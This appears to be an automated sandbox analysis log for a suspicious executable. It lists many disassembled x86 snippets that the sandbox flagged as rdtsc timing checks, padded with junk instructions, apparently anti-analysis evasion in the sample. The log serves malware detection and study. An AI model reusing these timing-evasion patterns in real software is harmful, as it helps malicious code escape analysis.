Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1084B0E second address: 1084B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1089F81 second address: 1089F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1089F87 second address: 1089F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F76E5186DE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1089F91 second address: 1089FAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108961B second address: 108961F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108961F second address: 108963B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F76E5036BAEh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108963B second address: 1089646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007F76E5186DE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1089646 second address: 1089670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jnl 00007F76E5036BA6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F76E5036BB6h 0x00000019 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1089670 second address: 1089699 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DEDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F76E5186DF1h 0x00000010 push ecx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1089CCE second address: 1089CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108DFC4 second address: 108DFC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1050565 second address: 105056A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1050ABD second address: 1050B1C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F76E5186DECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007F76E5186DEEh 0x00000011 jnc 00007F76E5186DE8h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F76E5186DF8h 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 jno 00007F76E5186DFEh 0x00000029 push ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1050B1C second address: 1050B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a js 00007F76E5036BB5h 0x00000010 jmp 00007F76E5036BAFh 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007F76E5036BB6h 0x0000001c mov dx, 5217h 0x00000020 popad 0x00000021 sub dword ptr [ebp+122D22D4h], eax 0x00000027 call 00007F76E5036BA9h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F76E5036BB5h 0x00000034 jo 00007F76E5036BA6h 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1050B86 second address: 1050B8B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1050B8B second address: 1050BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 jmp 00007F76E5036BB4h 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F76E5036BB9h 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1050BCD second address: 1050BFB instructions: 0x00000000 rdtsc 0x00000002 js 00007F76E5186DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F76E5186DF1h 0x00000010 jl 00007F76E5186DE6h 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1050BFB second address: 1050BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1050BFF second address: 1050C16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1050CDB second address: 1050CE1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1050CE1 second address: 1050D02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F76E5186DF2h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1050D02 second address: 1050D20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a mov dword ptr [ebp+122D1C1Dh], edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1050D20 second address: 1050D2A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F76E5186DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105142E second address: 1051438 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1051438 second address: 1051460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F76E5186DE8h 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1051460 second address: 10514E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F76E5036BA8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 sub dword ptr [ebp+122D190Dh], edi 0x0000002b push 0000001Eh 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F76E5036BA8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 clc 0x00000048 nop 0x00000049 jo 00007F76E5036BBFh 0x0000004f push esi 0x00000050 jmp 00007F76E5036BB7h 0x00000055 pop esi 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F76E5036BB6h 0x0000005e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10515BC second address: 10515C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10517B8 second address: 10517D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10518A6 second address: 10518E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 popad 0x00000013 push edi 0x00000014 mov edx, dword ptr [ebp+122D2AFBh] 0x0000001a pop edi 0x0000001b lea eax, dword ptr [ebp+124802F6h] 0x00000021 add cx, C185h 0x00000026 push eax 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F76E5186DF1h 0x0000002f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10518E1 second address: 1051939 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F76E5036BA8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+124802B2h] 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F76E5036BA8h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 nop 0x00000045 push esi 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1051939 second address: 105195A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 je 00007F76E5186E04h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F76E5186DF2h 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108E89A second address: 108E8AB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108E8AB second address: 108E8B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108E8B1 second address: 108E8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108E8B7 second address: 108E8CA instructions: 0x00000000 rdtsc 0x00000002 je 00007F76E5186DE8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b jbe 00007F76E5186DE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108EB47 second address: 108EB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108ECBE second address: 108ECC4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1091D93 second address: 1091D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1093DF3 second address: 1093E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F76E5186DF2h 0x0000000c jnp 00007F76E5186DE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109AEB8 second address: 109AEE8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F76E5036BB8h 0x00000012 popad 0x00000013 pop ebx 0x00000014 jne 00007F76E5036BC5h 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B054 second address: 109B058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B058 second address: 109B05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B05E second address: 109B067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B067 second address: 109B072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F76E5036BA6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B1F5 second address: 109B204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 ja 00007F76E5186E04h 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B204 second address: 109B215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F76E5036BA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B215 second address: 109B219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B675 second address: 109B69E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F76E5036BACh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F76E5036BB1h 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B69E second address: 109B6A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B6A4 second address: 109B6B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c popad 0x0000000d push ecx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B800 second address: 109B81C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F76E5186DF7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B81C second address: 109B825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B825 second address: 109B82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B82B second address: 109B84A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B84A second address: 109B863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5186DF3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B863 second address: 109B86E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F76E5036BA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109B992 second address: 109B99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109BD07 second address: 109BD40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 jmp 00007F76E5036BACh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop ebx 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F76E5036BB6h 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109BD40 second address: 109BD4A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76E5186DE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109AA24 second address: 109AA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F76E5036BA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109AA32 second address: 109AA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109AA36 second address: 109AA40 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109AA40 second address: 109AA72 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F76E5186DE6h 0x00000009 jmp 00007F76E5186DF6h 0x0000000e pop ecx 0x0000000f push esi 0x00000010 jmp 00007F76E5186DEFh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109F04F second address: 109F059 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F76E5036BA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109F17A second address: 109F19C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76E5186DEAh 0x00000009 jmp 00007F76E5186DF4h 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 109F19C second address: 109F1A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10A600C second address: 10A6035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jp 00007F76E5186DE6h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F76E5186DE6h 0x00000014 jmp 00007F76E5186DF5h 0x00000019 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1051258 second address: 10512BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F76E5036BB4h 0x0000000e nop 0x0000000f sbb cx, 56F7h 0x00000014 mov ebx, dword ptr [ebp+124802F1h] 0x0000001a call 00007F76E5036BB7h 0x0000001f mov dword ptr [ebp+122D2289h], edx 0x00000025 pop edi 0x00000026 add eax, ebx 0x00000028 call 00007F76E5036BB3h 0x0000002d mov di, 4F78h 0x00000031 pop edx 0x00000032 nop 0x00000033 pushad 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10AA770 second address: 10AA77B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F76E5186DE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10AEB7E second address: 10AEB84 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10AE3DB second address: 10AE3E1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10AE3E1 second address: 10AE3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F76E5036BB6h 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10AE3FF second address: 10AE41C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
